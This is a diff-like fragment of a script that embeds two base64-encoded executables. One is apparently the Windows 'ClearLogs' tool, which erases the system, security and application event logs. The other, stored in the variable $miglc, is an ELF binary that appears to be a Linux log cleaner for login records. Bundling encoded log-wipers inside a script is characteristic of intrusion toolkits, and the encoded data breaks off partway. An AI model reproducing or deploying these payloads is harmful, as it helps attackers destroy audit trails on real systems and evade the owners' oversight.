+/xWgUEAA6d4AAACD+AEPhdMAAAA5fSB1CKEYbEAAiUUgV1f/dRT/dRCLRST32BvAg+AIQFD/dSD/ +FZxQQACL2Ild5DvfD4ScAAAAiX38jQQbg8ADJPzo4AcAAIll6IvEiUXcg038/+sTagFYw4tl6DP/ +iX3cg038/4td5Dl93HRmU/913P91FP91EGoB/3Ug/xWcUEAAhcB0TVdXU/913P91DP91CP8VpFBA +AIvwiXXYO/d0MvZFDQR0QDl9HA+EsgAAADt1HH8e/3Uc/3UYU/913P91DP91CP8VpFBAAIXAD4WP +AAAAM8CNZciLTfBkiQ0AAAAAX15bycPHRfwBAAAAjQQ2g8ADJPzoLAcAAIll6IvciV3gg038/+sS +agFYw4tl6DP/M9uDTfz/i3XYO990tFZT/3Xk/3Xc/3UM/3UI/xWkUEAAhcB0nDl9HFdXdQRXV+sG +/3Uc/3UYVlNoIAIAAP91IP8VQFBAAIvwO/cPhHH///+Lxuls////i1QkCItEJASF0laNSv90DYA4 +AHQIQIvxSYX2dfOAOABedQUrRCQEw4vCw1WL7Gr/aJBUQABoYClAAGShAAAAAFBkiSUAAAAAg+wY +U1ZXiWXooSRsQAAz2zvDdT6NReRQagFeVmhwVEAAVv8VrFBAAIXAdASLxusdjUXkUFZobFRAAFZT +/xWoUEAAhcAPhM4AAABqAlijJGxAAIP4AnUki0UcO8N1BaEIbEAA/3UU/3UQ/3UM/3UIUP8VqFBA +AOmfAAAAg/gBD4WUAAAAOV0YdQihGGxAAIlFGFNT/3UQ/3UMi0Ug99gbwIPgCEBQ/3UY/xWcUEAA +iUXgO8N0Y4ld/I08AIvHg8ADJPzorwUAAIll6Iv0iXXcV1NW6A/8//+DxAzrC2oBWMOLZegz2zP2 +g038/zvzdCn/deBW/3UQ/3UMagH/dRj/FZxQQAA7w3QQ/3UUUFb/dQj/FaxQQADrAjPAjWXMi03w +ZIkNAAAAAF9eW8nDzMzMzMzMzMzMzFWL7FdWi3UMi00Qi30Ii8GL0QPGO/52CDv4D4J4AQAA98cD +AAAAdRTB6QKD4gOD+QhyKfOl/ySV2EpAAIvHugMAAACD6QRyDIPgAwPI/ySF8ElAAP8kjehKQACQ +/ySNbEpAAJAASkAALEpAAFBKQAAj0YoGiAeKRgGIRwGKRgLB6QKIRwKDxgODxwOD+QhyzPOl/ySV +2EpAAI1JACPRigaIB4pGAcHpAohHAYPGAoPHAoP5CHKm86X/JJXYSkAAkCPRigaIB0bB6QJHg/kI +cozzpf8kldhKQACNSQDPSkAAvEpAALRKQACsSkAApEpAAJxKQACUSkAAjEpAAItEjuSJRI/ki0SO +6IlEj+iLRI7siUSP7ItEjvCJRI/wi0SO9IlEj/SLRI74iUSP+ItEjvyJRI/8jQSNAAAAAAPwA/j/ +JJXYSkAAi//oSkAA8EpAAPxKQAAQS0AAi0UIXl/Jw5CKBogHi0UIXl/Jw5CKBogHikYBiEcBi0UI +Xl/Jw41JAIoGiAeKRgGIRwGKRgKIRwKLRQheX8nDkI10MfyNfDn898cDAAAAdSTB6QKD4gOD+Qhy +Df3zpfz/JJVwTEAAi//32f8kjSBMQACNSQCLx7oDAAAAg/kEcgyD4AMryP8khXhLQAD/JI1wTEAA +kIhLQACoS0AA0EtAAIpGAyPRiEcDTsHpAk+D+Qhytv3zpfz/JJVwTEAAjUkAikYDI9GIRwOKRgLB +6QKIRwKD7gKD7wKD+QhyjP3zpfz/JJVwTEAAkIpGAyPRiEcDikYCiEcCikYBwekCiEcBg+4Dg+8D +g/kID4Ja/////fOl/P8klXBMQACNSQAkTEAALExAADRMQAA8TEAARExAAExMQABUTEAAZ0xAAItE +jhyJRI8ci0SOGIlEjxiLRI4UiUSPFItEjhCJRI8Qi0SODIlEjwyLRI4IiUSPCItEjgSJRI8EjQSN +AAAAAAPwA/j/JJVwTEAAi/+ATEAAiExAAJhMQACsTEAAi0UIXl/Jw5CKRgOIRwOLRQheX8nDjUkA +ikYDiEcDikYCiEcCi0UIXl/Jw5CKRgOIRwOKRgKIRwKKRgGIRwGLRQheX8nDi0wkBFY7DaBxQABX +c1WLwYvxwfgFg+YfjTyFoHBAAMHmA4sHA8b2QAQBdDeDOP90MoM99GFAAAF1HzPAK8h0EEl0CEl1 +E1Bq9OsIUGr16wNQavb/FbBQQACLB4MMMP8zwOsUgyV4akAAAMcFdGpAAAkAAACDyP9fXsOLRCQE +OwWgcUAAcxyLyIPgH8H5BYsMjaBwQAD2RMEEAY0EwXQDiwDDgyV4akAAAMcFdGpAAAkAAACDyP/D +i0wkBDPSiQ14akAAuABpQAA7CHQgg8AIQj1oakAAfPGD+RNyHYP5JHcYxwV0akAADQAAAMOLBNUE +aUAAo3RqQADDgfm8AAAAchKB+coAAADHBXRqQAAIAAAAdgrHBXRqQAAWAAAAw1NVVleLfCQUOz2g +cUAAD4OGAAAAi8eL98H4BYPmH40chaBwQADB5gOLA/ZEMAQBdGlX6CX///+D+P9ZdDyD/wF0BYP/ +AnUWagLoDv///2oBi+joBf///1k7xVl0HFfo+f7//1lQ/xW0UEAAhcB1Cv8VEFBAAIvo6wIz7Vfo +Yf7//4sDWYBkMAQAhe10CVXoBv///1nrFTPA6xSDJXhqQAAAxwV0akAACQAAAIPI/19eXVvDVot0 +JAiLRgyog3QdqAh0Gf92COiB4v//ZoFmDPf7M8BZiQaJRgiJRgRew8zMzMzMzMzMzMzMzMzMzFE9 +ABAAAI1MJAhyFIHpABAAAC0AEAAAhQE9ABAAAHPsK8iLxIUBi+GLCItABFDDzP8lbFBAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAADyVQAA4FUAANBVAAAAAAAAslUAAKBVAABWVwAAEFYAAB5WAAAyVgAA +RlYAAFhWAABmVgAAglYAAJhWAACyVgAAzFYAAOJWAAD6VgAAFFcAACZXAAA2VwAARFcAAJRVAABk +VwAAclcAAIBXAACMVwAAmFcAAKRXAACwVwAAvFcAAMZXAADSVwAA4lcAAPBXAAACWAAAElgAACZY +AAA4WAAATlgAAF5YAABuWAAAgFgAAJJYAACiWAAAAAAAAAAAAAD/////zhZAAOIWQAAGAAAGAAEA +ABAAAwYABgIQBEVFRQUFBQUFNTAAUAAAAAAgKDhQWAcIADcwMFdQBwAAICAIAAAAAAhgaGBgYGAA +AHBweHh4eAgHCAAABwAICAgAAAgACAAHCAAAACgAbgB1AGwAbAApAAAAAAAobnVsbCkAAHJ1bnRp +bWUgZXJyb3IgAAANCgAAVExPU1MgZXJyb3INCgAAAFNJTkcgZXJyb3INCgAAAABET01BSU4gZXJy +b3INCgAAUjYwMjgNCi0gdW5hYmxlIHRvIGluaXRpYWxpemUgaGVhcA0KAAAAAFI2MDI3DQotIG5v +dCBlbm91Z2ggc3BhY2UgZm9yIGxvd2lvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjYNCi0gbm90 +IGVub3VnaCBzcGFjZSBmb3Igc3RkaW8gaW5pdGlhbGl6YXRpb24NCgAAAABSNjAyNQ0KLSBwdXJl +IHZpcnR1YWwgZnVuY3Rpb24gY2FsbA0KAAAAUjYwMjQNCi0gbm90IGVub3VnaCBzcGFjZSBmb3Ig +X29uZXhpdC9hdGV4aXQgdGFibGUNCgAAAABSNjAxOQ0KLSB1bmFibGUgdG8gb3BlbiBjb25zb2xl +IGRldmljZQ0KAAAAAFI2MDE4DQotIHVuZXhwZWN0ZWQgaGVhcCBlcnJvcg0KAAAAAFI2MDE3DQot +IHVuZXhwZWN0ZWQgbXVsdGl0aHJlYWQgbG9jayBlcnJvcg0KAAAAAFI2MDE2DQotIG5vdCBlbm91 +Z2ggc3BhY2UgZm9yIHRocmVhZCBkYXRhDQoADQphYm5vcm1hbCBwcm9ncmFtIHRlcm1pbmF0aW9u +DQoAAAAAUjYwMDkNCi0gbm90IGVub3VnaCBzcGFjZSBmb3IgZW52aXJvbm1lbnQNCgBSNjAwOA0K +LSBub3QgZW5vdWdoIHNwYWNlIGZvciBhcmd1bWVudHMNCgAAAFI2MDAyDQotIGZsb2F0aW5nIHBv +aW50IG5vdCBsb2FkZWQNCgAAAABNaWNyb3NvZnQgVmlzdWFsIEMrKyBSdW50aW1lIExpYnJhcnkA +AAAACgoAAFJ1bnRpbWUgRXJyb3IhCgpQcm9ncmFtOiAAAAAuLi4APHByb2dyYW0gbmFtZSB1bmtu +b3duPgAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEAdXNl +cjMyLmRsbAAAAAAAAAAAAAAAAAAA//////5GQAACR0AA/////7JHQAC2R0AA/////zZJQAA6SUAA +6FQAAAAAAAAAAAAAwlUAABBQAADYVAAAAAAAAAAAAAACVgAAAFAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAA8lUAAOBVAADQVQAAAAAAALJVAACgVQAAVlcAABBWAAAeVgAAMlYAAEZWAABYVgAAZlYAAIJW +AACYVgAAslYAAMxWAADiVgAA+lYAABRXAAAmVwAANlcAAERXAACUVQAAZFcAAHJXAACAVwAAjFcA +AJhXAACkVwAAsFcAALxXAADGVwAA0lcAAOJXAADwVwAAAlgAABJYAAAmWAAAOFgAAE5YAABeWAAA +blgAAIBYAACSWAAAolgAAAAAAADMAUxvY2FsRnJlZQCvAEZvcm1hdE1lc3NhZ2VBAAAaAUdldExh +c3RFcnJvcgAAS0VSTkVMMzIuZGxsAAAyAENsb3NlRXZlbnRMb2cAMABDbGVhckV2ZW50TG9nQQAA +QAFPcGVuRXZlbnRMb2dBAEFEVkFQSTMyLmRsbAAAfQBFeGl0UHJvY2VzcwCeAlRlcm1pbmF0ZVBy +b2Nlc3MAAPcAR2V0Q3VycmVudFByb2Nlc3MAygBHZXRDb21tYW5kTGluZUEAdAFHZXRWZXJzaW9u +AACtAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAJAFHZXRNb2R1bGVGaWxlTmFtZUEAALIARnJl +ZUVudmlyb25tZW50U3RyaW5nc0EAswBGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwDSAldpZGVDaGFy +VG9NdWx0aUJ5dGUABgFHZXRFbnZpcm9ubWVudFN0cmluZ3MACAFHZXRFbnZpcm9ubWVudFN0cmlu +Z3NXAABtAlNldEhhbmRsZUNvdW50AABSAUdldFN0ZEhhbmRsZQAAFQFHZXRGaWxlVHlwZQBQAUdl +dFN0YXJ0dXBJbmZvQQCdAUhlYXBEZXN0cm95AJsBSGVhcENyZWF0ZQAAvwJWaXJ0dWFsRnJlZQCf +AUhlYXBGcmVlAAAvAlJ0bFVud2luZADfAldyaXRlRmlsZQCZAUhlYXBBbGxvYwC/AEdldENQSW5m +bwC5AEdldEFDUAAAMQFHZXRPRU1DUAAAuwJWaXJ0dWFsQWxsb2MAAKIBSGVhcFJlQWxsb2MAPgFH +ZXRQcm9jQWRkcmVzcwAAwgFMb2FkTGlicmFyeUEAAKoARmx1c2hGaWxlQnVmZmVycwAAagJTZXRG +aWxlUG9pbnRlcgAA5AFNdWx0aUJ5dGVUb1dpZGVDaGFyAL8BTENNYXBTdHJpbmdBAADAAUxDTWFw +U3RyaW5nVwAAUwFHZXRTdHJpbmdUeXBlQQAAVgFHZXRTdHJpbmdUeXBlVwAAfAJTZXRTdGRIYW5k +bGUAABsAQ2xvc2VIYW5kbiBAABQ2QAAAAAAAAAAAAK8gQAAAAAAAAAAAAAAAAAAAAAAA +U3VjY2VzczogVGhlIGxvZyBoYXMgYmVlbiBjbGVhcmVkCgAARXJyb3I6IFVuYWJsZSB0byBjbGVh +ciBsb2cgLSAAAAAlcwoARXJyb3I6IFVuYWJsZSB0byBvcGVuIGxvZyAtIAAAAAAgICAgICAgIC1z +eXMgPSBzeXN0ZW0gbG9nCgAAICAgICAgICAtc2VjID0gc2VjdXJpdHkgbG9nCgAAAAAgICAgICAg +IC1hcHAgPSBhcHBsaWNhdGlvbiBsb2cKACBVc2FnZTogY2xlYXJsb2dzIFtcXGNvbXB1dGVybmFt +ZV0gPC1hcHAgLyAtc2VjIC8gLXN5cz4KCgAAAFN5c3RlbQAALXN5cwAAAABTZWN1cml0eQAAAAAt +c2VjAAAAAEFwcGxpY2F0aW9uAC1hcHAAAAAAICAgICAgICAgICAgICAtIGh0dHA6Ly9udHNlY3Vy +aXR5Lm51L3Rvb2xib3gvY2xlYXJsb2dzLwoKAAAAQ2xlYXJMb2dzIDEuMCAtIChjKSAyMDAyLCBB +cm5lIFZpZHN0cm9tIChhcm5lLnZpZHN0cm9tQG50c2VjdXJpdHkubnUpCgAACgAAAA4UQAABAAAA +OFFAAChRQADAcUAAAAAAAMBxQAABAQAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAB +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgwAsAAAAAAAAAHQAAwAQAAAAAAAAAlgAAwAQAAAAAAAAA +jQAAwAgAAAAAAAAAjgAAwAgAAAAAAAAAjwAAwAgAAAAAAAAAkAAAwAgAAAAAAAAAkQAAwAgAAAAA +AAAAkgAAwAgAAAAAAAAAkwAAwAgAAAAAAAAAAwAAAAcAAAAKAAAAjAAAAP////8ACgAAEAAAACAF +kxkAAAAAAAAAAAAAAAAAAAAAAgAAAKRTQAAIAAAAeFNAAAkAAABMU0AACgAAAChTQAAQAAAA/FJA +ABEAAADMUkAAEgAAAKhSQAATAAAAfFJAABgAAABEUkAAGQAAABxSQAAaAAAA5FFAABsAAACsUUAA +HAAAAIRRQAB4AAAAdFFAAHkAAABkUUAAegAAAFRRQAD8AAAAUFFAAP8AAABAUUAAAAAAAAAAAABW +REAAVkRAAFZEQABWREAAVkRAAFZEQADiZUAA4mVAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgA +KAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQ +ABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEA +gQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACC +AIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAA +EAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBAgAAAAApAMA +AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA +AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA +ADF+gf4AAAAAAAAAAAAAAAD4AwAAAQAAAC4AAAABAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA +BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL +AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA +AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA +ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA +CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC +AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AA=="; + +$miglc="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAIIgECDQAAAA0XAAAAAAAADQAIAAGACgAHgAbAAYAAAA0 +AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBMAAAATAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQI4DYAAOA2AAAFAAAAABAAAAEAAADgNgAA4MYECODGBAh0AQAAmAEA +AAYAAAAAEAAAAgAAAIw3AACMxwQIjMcECMgAAADIAAAABgAAAAQAAAAEAAAACAEAAAiBBAgIgQQI +IAAAACAAAAAEAAAABAAAAC9saWIvbGQtbGludXguc28uMgAABAAAABAAAAABAAAAR05VAAAAAAAC +AAAAAgAAAAUAAAARAAAAHwAAAAAAAAATAAAADAAAAAUAAAAOAAAAGQAAABUAAAAcAAAAEgAAAAIA +AAAbAAAACwAAAB4AAAAaAAAADQAAAB0AAAAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAADAAAABAAAAAAAAAAAAAAACgAAAAYAAAAAAAAAAAAAAAgAAAAHAAAAAAAAAAAAAAAQAAAA +CQAAAAEAAAAAAAAAFwAAAAAAAAAYAAAAFAAAAA8AAAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv +AAAAjIYECCcAAAASAAAA+gAAAJyGBAiBAAAAIgAAAHIAAACshgQIPQAAABIAAACkAAAAvIYECC8A +AAASAAAAEAEAAMyGBAg3AAAAEgAAAHgAAADchgQIKQAAABIAAABKAAAA7IYECOQCAAASAAAAUQAA +APyGBAhwAgAAEgAAAFgAAAAMhwQIXAAAABIAAACAAAAAHIcECKwAAAAiAAAAKAAAAFTIBAgEAAAA +EQAWALwAAABYyAQIBAAAABEAFgCdAAAALIcECDAAAAASAAAA7gAAADyHBAgdAAAAEgAAANwAAABM +hwQIxgAAABIAAAAhAAAAXIcECC4AAAASAAAAZgAAAGyHBAg9AAAAEgAAADQAAAB8hwQINwAAABIA +AAA7AAAAjIcECIEAAAAiAAAA9QAAAJyHBAg9AAAAEgAAAGwAAACshwQIMQAAABIAAACrAAAAvIcE +CD0BAAASAAAAwwAAAMyHBAj1AAAAEgAAAMgAAADchwQIJwAAABIAAABfAAAAXMgECAQAAAARABYA +zQAAACSoBAgEAAAAEQAOALQAAADshwQIKQAAABIAAACYAAAA/IcECD0AAAASAAAAAQAAAAAAAAAA +AAAAIAAAABoAAAAMiAQIHwAAABIAAAAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AHN0cmNweQBw +cmludGYAc3Rkb3V0AGF0b2wAbWVtY3B5AF9fY3hhX2ZpbmFsaXplAHN5c3RlbQBtYWxsb2MAcmVt +b3ZlAG9wdGFyZwBsc2VlawBiemVybwB3cml0ZQBmcHJpbnRmAF9fZGVyZWdpc3Rlcl9mcmFtZV9p +bmZvAHJlYWQAZ2V0b3B0AHN0cmNtcABnZXRwd25hbQBzcHJpbnRmAHN0ZGVycgBleGl0AGF0b2kA +X0lPX3N0ZGluX3VzZWQAX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAG9wZW4AX19yZWdpc3Rlcl9m +cmFtZV9pbmZvAGNsb3NlAEdMSUJDXzIuMS4zAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgAC +AAIAAgACAAIAAgACAAIAAgACAAMAAgACAAIAAgACAAIAAQACAAIAAAACAAAAAQACABAAAAAQAAAA +AAAAAHMfaQkAAAMAFgEAABAAAAAQaWkNAAACACIBAAAAAAAAiMcECAYdAABUyAQIBQsAAFjIBAgF +DAAAXMgECAUZAAAkxwQIBwEAACjHBAgHAgAALMcECAcDAAAwxwQIBwQAADTHBAgHBQAAOMcECAcG +AAA8xwQIBwcAAEDHBAgHCAAARMcECAcJAABIxwQIBwoAAEzHBAgHDQAAUMcECAcOAABUxwQIBw8A +AFjHBAgHEAAAXMcECAcRAABgxwQIBxIAAGTHBAgHEwAAaMcECAcUAABsxwQIBxUAAHDHBAgHFgAA +dMcECAcXAAB4xwQIBxgAAHzHBAgHGwAAgMcECAccAACExwQIBx4AAFWJ5YPsCOjVAQAAkOhrAgAA +6EYhAADJw/81HMcECP8lIMcECAAAAAD/JSTHBAhoAAAAAOng/////yUoxwQIaAgAAADp0P////8l +LMcECGgQAAAA6cD/////JTDHBAhoGAAAAOmw/////yU0xwQIaCAAAADpoP////8lOMcECGgoAAAA +6ZD/////JTzHBAhoMAAAAOmA/////yVAxwQIaDgAAADpcP////8lRMcECGhAAAAA6WD/////JUjH +BAhoSAAAAOlQ/////yVMxwQIaFAAAADpQP////8lUMcECGhYAAAA6TD/////JVTHBAhoYAAAAOkg +/////yVYxwQIaGgAAADpEP////8lXMcECGhwAAAA6QD/////JWDHBAhoeAAAAOnw/v///yVkxwQI +aIAAAADp4P7///8laMcECGiIAAAA6dD+////JWzHBAhokAAAAOnA/v///yVwxwQIaJgAAADpsP7/ +//8ldMcECGigAAAA6aD+////JXjHBAhoqAAAAOmQ/v///yV8xwQIaLAAAADpgP7///8lgMcECGi4 +AAAA6XD+////JYTHBAhowAAAAOlg/v//AAAAADHtXonhg+TwUFRSaACoBAhoZIYECFFWaCCJBAjo +C/////SJ9lWJ5VNQ6AAAAABbgcPKPgAAi4NwAAAAhcB0Av/Qi138ycOJ9pCQkJCQkJCQVYnlg+wI +ixXsxgQIhdJ1SYsV6MYECIsChcB0Go10JgCNQgSj6MYECP8SixXoxgQIiwqFyXXquByHBAiFwHQQ +g+wMaATHBAjoYP7//4PEELgBAAAAo+zGBAiJ7F3DjXYAVYnlg+wIiexdw422AAAAAFW4nIYECInl +g+wIhcB0FYPsCGhgyAQIaATHBAjom/3//4PEEInsXcOQjbQmAAAAAFWJ5YPsCInsXcONtgAAAABV +ieWB7IgHAADHhbT4//8AAAAAx4Ww+P//AAAAAMeFrPj//wAAAADHhaj4//8AAAAAx4Wk+P////// +/8eFoPj//wAAAADHhZz4//8AAAAAx4WY+P//AAAAAMeFlPj//wAAAADHhZD4//8AAAAAx4WM+P// +AAAAAMeFiPj//wAAAADHhYT4//8AAAAAg+wIahCNRdhQ6PP9//+DxBCD7AhoAAEAAI2F2P7//1Do +3P3//4PEEIPsCGgAAQAAjYXY/f//UOjF/f//g8QQg+wIaAABAACNhdj8//9Q6K79//+DxBCD7Ahq +EI2FyPz//1Domv3//4PEEIPsCGoQjYW4/P//UOiG/f//g8QQg+wIaAABAACNhbj7//9Q6G/9//+D +xBCD7AhoAAEAAI2FuPr//1DoWP3//4PEEIPsCGgAAQAAjYW4+f//UOhB/f//g8QQg+wIaAABAACN +hbj4//9Q6Cr9//+DxBCD7AhoQKgECI2F2P7//1Doc/3//4PEEIPsBGhKqAQI/3UM/3UI6H38//+D +xBCJwIhF94pF9zz/dQbp7QEAAJAPvkX3g+hBiYWA+P//g72A+P//NHfCi5WA+P//iwSVcKkECP/g +jXYAg+wI/zVcyAQIjUXYUOgO/f//g8QQjYWU+P///wDrkZCD7Az/NVzIBAjowvz//4PEEInAicCJ +haT4///pcP///4PsCGgAAQAAjYXY/v//UOhs/P//g8QQg+wI/zVcyAQIjYXY/v//UOi0/P//g8QQ +jYWQ+P///wDpNP///4PsCP81XMgECI2F2P3//1Doj/z//4PEEI2FhPj///8A6Q////+NdgCD7Aj/ +NVzIBAiNhdj8//9Q6Gf8//+DxBCNhYT4////AOnn/v//jXYAg+wI/zVcyAQIjYXI/P//UOg//P// +g8QQjYWM+P///wDpv/7//412AIPsCP81XMgECI2FuPz//1DoF/z//4PEEI2FjPj///8A6Zf+//+N +dgCD7Aj/NVzIBAiNhbj7//9Q6O/7//+DxBCNhYz4////AOlv/v//jXYAg+wM/zVcyAQI6E76//+D +xBCJwInAiYW0+P//jYWM+P///wDpRP7//4PsDP81XMgECOgm+v//g8QQicCJwImFsPj//42FjPj/ +//8A6Rz+//+Nhaz4////AOkP/v//jXYAjYWo+P///wDp//3//412AI2FmPj///8A6e/9//+NdgCD +vZT4//8AdR+Dvaj4//8AdRaDvZD4//8AdQ2DvYT4//8AdQTrdIn2g72s+P//AXUJg72o+P//AXRg +g72o+P//AXUJg72M+P//BXVOg72s+P//AXULg72U+P//AHUC6zqDvaz4//8BdQuDvYz4//8AdQLr +JoO9rPj//wF1C4O9pPj//wB1AusSg72Q+P//AXUjg72E+P//AHUag+wMi0UM/zDo4RgAAIPEEIPs +DGoA6Gj6//+D7AxogKgECOjr+f//g8QQg+wMaMCoBAjo2/n//4PEEIPsDGgAqQQI6Mv5//+DxBCD +vaT4////dQrHhaT4//8BAAAAgH3YAHQfg+wE/7WY+P//agGNRdhQ6LcCAACDxBCJwImFoPj//4O9 